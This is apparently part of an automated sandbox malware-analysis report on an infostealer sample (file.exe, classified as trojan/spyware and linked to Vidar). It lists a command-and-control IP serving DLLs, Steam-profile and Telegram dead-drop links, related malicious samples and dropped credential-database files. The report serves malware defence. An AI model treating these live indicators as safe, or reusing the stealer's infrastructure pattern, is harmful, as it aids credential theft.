                                                                                            • 9%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://65.108.152.56:9000/vcruntime140.dll_7)RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://help.steampowered.com/en/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                              high
                                                                                              https://steamcommunity.com/market/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                high
                                                                                                https://store.steampowered.com/news/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                  high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                      high
                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IEHJJE.1.drfalse
                                                                                                        high
                                                                                                        http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                          high
                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119968044916976561199680449169[1].htm.1.drfalse
                                                                                                            high
                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                high
                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                    high
                                                                                                                    https://t.me/r1g1ofile.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                        high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                          high
                                                                                                                          https://65.108.152.56:9000lGoogleRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          low
                                                                                                                          https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                            high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                              high
                                                                                                                              https://65.108.152.56:9000/freebl3.dll4RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHDBKJE.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchIEHJJE.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://65.108.152.56:9000lRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      low
                                                                                                                                      https://65.108.152.56:9000/ngRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://65.108.152.56:9000/msvcp140.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
65.108.152.56 | unknown | United States | 11022 | ALABANZA-BALTUS | false
104.105.90.131 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                      Analysis ID:1437185
                                                                                                                                                      Start date and time:2024-05-07 05:28:06 +02:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 19s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:file.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/12@1/2
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 97%
                                                                                                                                                      • Number of executed functions: 62
                                                                                                                                                      • Number of non-executed functions: 235
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 104.102.251.17, 104.102.251.89
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:28:58 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      104.105.90.131https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                        https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                    ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          bg.microsoft.map.fastly.nethttps://administracionglobal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.reqwcmjr.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.wxoqpatm.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          https://govindaaamma.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          https://cloude-15e5.karsonjacobsen.workers.dev/d2d7e935-4585-4825-8391-46e4c9be230dGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://windowsprogramdangererrorfoundcritical.kesug.com/?i=3Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.tckukspz.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          http://cpmcontsruction.com/DtRZMUGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          http://ppmm.careGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          May-Document-6_2024-5062.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          steamcommunity.comGj8P0mbklo.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                          https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.96.244.29
                                                                                                                                                                          BS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 23.66.133.162
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                          tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          AKAMAI-ASUS23cu4ulxOg.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 172.225.201.2
                                                                                                                                                                          condition-agreement_2024_05_06_26.lnk.bin.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                          • 104.71.240.137
                                                                                                                                                                          https://docfilsxviews.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.61.53.95
                                                                                                                                                                          Gj8P0mbklo.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 96.17.61.58
                                                                                                                                                                          powershell.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.193.120.112
                                                                                                                                                                          pDWZMd3100.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                          • 23.40.23.231
                                                                                                                                                                          bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 96.16.159.21
                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.50.124.114
                                                                                                                                                                          ALABANZA-BALTUSBS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 65.108.93.119
                                                                                                                                                                          e5oMWYWLig.exeGet hashmaliciousRedLineBrowse
• 65.108.19.51
WFdAK6HQgz.elf | Get hash | malicious | Unknown | Browse
• 65.109.195.235
FATURA PROFORMA.exe | Get hash | malicious | AgentTesla | Browse
• 65.108.69.93
SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | Get hash | malicious | PrivateLoader, PureLog Stealer | Browse
• 65.108.134.122
file.exe | Get hash | malicious | Vidar | Browse
• 65.109.242.73
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe | Get hash | malicious | Phonk Miner, PureLog Stealer, Vidar | Browse
• 65.109.242.73
file.exe | Get hash | malicious | Vidar | Browse
• 65.109.242.73
file.exe | Get hash | malicious | Vidar | Browse
• 65.109.242.73
QBv5s2bHnV.elf | Get hash | malicious | Unknown | Browse
• 64.176.126.17
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | Transferencia-Caixa Bank.exe | Get hash | malicious | Discord Token Stealer, GuLoader | Browse
• 104.105.90.131
HXUYIDwIMY.exe | Get hash | malicious | Meduza Stealer | Browse
• 104.105.90.131
Gj8P0mbklo.exe | Get hash | malicious | Arc Stealer | Browse
• 104.105.90.131
onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse
• 104.105.90.131
SecuriteInfo.com.NSIS.MalwareX-gen.17953.29383.exe | Get hash | malicious | GuLoader | Browse
• 104.105.90.131
EXP263 Grupa Decora ARKU8341370 1x40.exe | Get hash | malicious | GuLoader, Remcos | Browse
• 104.105.90.131
List of our requirements 06520204Fly Wing.vbs | Get hash | malicious | FormBook, GuLoader | Browse
• 104.105.90.131
EXP263 Decora Group ARKU8341370 1x40.exe | Get hash | malicious | GuLoader, Remcos | Browse
• 104.105.90.131
73zGJqwgDy.exe | Get hash | malicious | MofongoLoader | Browse
• 104.105.90.131
J5kltefeTK.exe | Get hash | malicious | MofongoLoader | Browse
• 104.105.90.131
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | file.exe | Get hash | malicious | Vidar | Browse
file.exe | Get hash | malicious | Vidar | Browse
file.exe | Get hash | malicious | Vidar | Browse
tZvjMg3Hw9.exe | Get hash | malicious | PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT | Browse
file.exe | Get hash | malicious | Vidar | Browse
WlCIinu0yp.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT | Browse
file.exe | Get hash | malicious | LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine | Browse
file.exe | Get hash | malicious | Vidar | Browse
0dN59ZIkEM.exe | Get hash | malicious | Vidar | Browse
file.exe | Get hash | malicious | Vidar | Browse
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 126976
Entropy (8bit): 0.47147045728725767
Encrypted: false
SSDEEP: 96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5: A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1: BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256: B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512: C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: modified
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 49152
Entropy (8bit): 0.8180424350137764
Encrypted: false
SSDEEP: 96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5: 349E6EB110E34A08924D92F6B334801D
SHA1: BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256: C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512: 2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category: dropped
Size (bytes): 28672
Entropy (8bit): 2.5793180405395284
Encrypted: false
SSDEEP: 96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5: 41EA9A4112F057AE6BA17E2838AEAC26
SHA1: F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256: CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512: 29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.7873599747470391
Encrypted: false
SSDEEP: 96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5: 6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1: 4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256: 0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512: BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.1358696453229276
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5: 28591AA4E12D1C4FC761BE7C0A468622
SHA1: BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256: 51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512: 5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious: false
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):69993
                                                                                                                                                                                              Entropy (8bit):7.99584879649948
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                                                                                                                                              MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                                                                                                                                              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                                                                                                                                              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                                                                                                                                              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                              Entropy (8bit):3.217935332070547
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:kKklEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:MlbkPlE99SNxAhUeVLVt
                                                                                                                                                                                              MD5:457C16EABAD85393C2438B34FEB507A6
                                                                                                                                                                                              SHA1:0CE6ADD73AD8EE9C5AE93913F90C10F60B2E2F84
                                                                                                                                                                                              SHA-256:DA40515D3E2FB4633893866C996982458B76FFDA1977689597DAED2146E26A71
                                                                                                                                                                                              SHA-512:D9FA070DE00C0BDDE916FD8A902302CFC9BC09FFCC0BFAAC8CD967EA39A790DB8D85905176ECBC09E2F1DF19749D8FD9D113AE2D7F46DC3350B96FB1B3291389
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:p...... ........ .9.....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                              Entropy (8bit):4.0050635535766075
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35663
                                                                                                                                                                                              Entropy (8bit):5.3820204547725865
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:c7pqLtWYmwt5D0gq9siNGAGPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sq:c78LtWYmwt5D0gq9scGPzzgiJmDzJtx2
                                                                                                                                                                                              MD5:ED01FF8187C1C331702AB5F6E5E1631B
                                                                                                                                                                                              SHA1:B982DE4E0762387C0FFFCFAC84B86FAE16EA52C1
                                                                                                                                                                                              SHA-256:CB3DC06E3EBE65FC84FB78704A23A69B5961B6F62D72CAD01B2AECD4774763BE
